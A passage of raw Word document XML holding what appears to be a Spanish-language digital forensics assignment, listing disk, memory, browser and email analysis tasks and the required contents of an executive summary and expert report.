          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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 w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3169BBA5" w14:textId="5A4BC759"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Buscar los procesos en funcionamiento y localiza aquellos que te parezcan de interés para el análisis forense del ordenador analizado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C1DAD4" w14:textId="566F47A2"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Listar las conexiones de red y analizarlas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF4EAEE" w14:textId="6362AA32" w:rsidR="00D30AE3" w:rsidRPr="00D16863" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Relativo al análisis del Disco Duro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE58639" w14:textId="18A0D56F" w:rsidR="00D30AE3" w:rsidRPr="00D16863" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Comprobar la integridad</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> del disco duro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B29C7" w14:textId="31377376" w:rsidR="00D30AE3" w:rsidRPr="00D16863" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Determinar la siguiente información del disco duro.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C292C7" w14:textId="1FEDBD10" w:rsidR="00D30AE3" w:rsidRPr="00D16863" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Sistema y versión del sistema operativo instalado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E859829" w14:textId="7E7AD9D0" w:rsidR="00D30AE3" w:rsidRPr="00D16863" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Nombre del propietario y relación de software instalado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B3BC0" w14:textId="42CB6B45" w:rsidR="00D30AE3" w:rsidRPr="00D30AE3" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"Product ID</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Product ID: Identificador único para un producto de software, usado para su gestión y seguimiento."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>" y "Product Key</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Product Key: Clave de licencia utilizada para activar software comercial."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">" asociadas al </w:t>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A0334D" w14:textId="6F8A10C3" w:rsidR="00D30AE3" w:rsidRPr="00D30AE3" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Fecha y hora de instalación del sistema operativo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B80ACE" w14:textId="6C229042"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Determinar qué usuarios tiene definidos el sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8349AA" w14:textId="7323C0C7"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Localizar los documentos (archivos PDF, de texto, hojas de cálculo, etc.) que puedan tener relación con alguna conducta presuntamente delictiva.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F83EAD2" w14:textId="545ACCF3"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 xml:space="preserve">Localizar algún fichero ejecutable que pueda resultar de interés para la investigación, </w:t>
      </w:r>
      <w:r w:rsidR="00696354" w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>además</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, analizar la relación con alguna evidencia anterior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D46211" w14:textId="16BE3CBF"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Determinar el contenido del fichero log de un conocido programa de comunicación si es necesario y relacionarlo con el caso investigado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C2EF9A" w14:textId="4BDB27CE"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Realizar un análisis de la navegación web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786EFC79" w14:textId="604688A7"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 xml:space="preserve">Visualización de los </w:t>
      </w:r>
      <w:r w:rsidR="00C43B18" w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>enlaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> de los archivos y de los archivos accedidos recientemente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D89E0C" w14:textId="66B47CD2"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Estudio de los metadatos de los archivos, si se considera que pueden ser relevantes para el caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFDA193" w14:textId="3DD34623"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Estudio de las bases de datos instaladas y las aplicaciones que permiten su gestión.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D81CD6" w14:textId="60F9FA11"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Análisis de los clientes de correo electrónico y del webmail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D71C15" w14:textId="51751CB0"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Realizar un estudio de la seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5CF90A" w14:textId="70FB3936"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Estudiar si las evidencias analizadas han sido comprometidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CAE34D" w14:textId="70CEC10E"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Identificar cualquier aplicación vulnerable, software malicioso, evaluar el daño sufrido, identificar los archivos que han sido comprometidos, así como determinar la vía de acceso al sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7EE5AE" w14:textId="4D40618E" w:rsidR="00D30AE3" w:rsidRPr="00D30AE3" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Relativo al resumen ejecutivo, elaborarlo teniendo en cuenta los siguientes apartados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613DFC7B" w14:textId="46D11A6A"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Claridad en la comunicación, proporcionando información de forma clara y concisa y, por otro lado, utilizar un lenguaje accesible para los no expertos en el área.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220BE456" w14:textId="5EEF36BD"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lastRenderedPageBreak/>
        <w:t>Presentar el contexto u antecedentes, describiendo el motivo y las circunstancias del análisis forense y Proporcionar una breve descripción del incidente o situación bajo investigación.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D436F10" w14:textId="1A13CF86"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Redactar un resumen ejecutivo con los hallazgos clave y las recomendaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F089F03" w14:textId="050CF983"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Describir la metodología utilizada durante el análisis forense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D03CF5" w14:textId="133D2DB0"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Proporcionar una línea de tiempo detallada de los eventos y acciones tomadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6009EC" w14:textId="5F0DAE6E"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Incluir evidencia técnica relevante, como registros de logs, archivos</w:t>
      </w:r>
      <w:r w:rsidR="008A7329">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E80326B" w14:textId="4E294361"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Proporcionar recomendaciones para la acción futura, basadas en los hallazgos y conclusiones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4278E2A9" w14:textId="51E68DF4" w:rsidR="00D30AE3" w:rsidRPr="00D30AE3" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Elaborar un informe pericial teniendo en cuenta los siguientes apartados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329C5459" w14:textId="566EE47D"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Mantener una postura objetiva e imparcial en todo momento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325CA3D6" w14:textId="774073E3" w:rsidR="00D30AE3" w:rsidRPr="00D1686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 xml:space="preserve">Garantizar que el análisis y las conclusiones estén fundamentados en evidencias </w:t>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tangibles y replicables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270629DA" w14:textId="78F9B879" w:rsidR="00D30AE3" w:rsidRPr="00D16863" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mantener la cadena de custodia</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Cadena de custodia: Proceso documentado que rastrea la manipulación de evidencia, como datos digitales, desde su recolección hasta su presentación en un tribunal."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la integridad</w:t>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Integridad: En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida."</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> de las pruebas durante todo el proceso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32805342" w14:textId="5B7D524A" w:rsidR="00D30AE3" w:rsidRPr="00D16863" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:ind w:hanging="927"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Redactar el informe de manera clara, precisa y entendible para personas sin conocimientos técnicos específicos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD6703E" w14:textId="5F45A6B2"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 xml:space="preserve">Presentar de forma clara y precisa los hallazgos resultantes del análisis forense. Los </w:t>
      </w:r>
      <w:r w:rsidR="00696354" w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cuáles</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30AE3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> será</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A55536D" w14:textId="187CAEB1"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Interpretar las evidencias de manera fundamentada y ligada a las normativas y principios de la ciencia forense digital.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466E46DA" w14:textId="341E4766"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Derivar conclusiones basadas exclusivamente en las evidencias y hallazgos del análisis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA0F343" w14:textId="08A5F53E"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Ofrecer una opinión pericial en base a los hallazgos, respetando los límites de la prueba pericial y los datos disponibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2B419D" w14:textId="4E8DEFF6"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Discutir las implicaciones legales de los hallazgos y su posible impacto en el caso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7605DE26" w14:textId="5DB2D1B9" w:rsidR="00D30AE3" w:rsidRPr="00D30AE3" w:rsidRDefault="00D30AE3">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
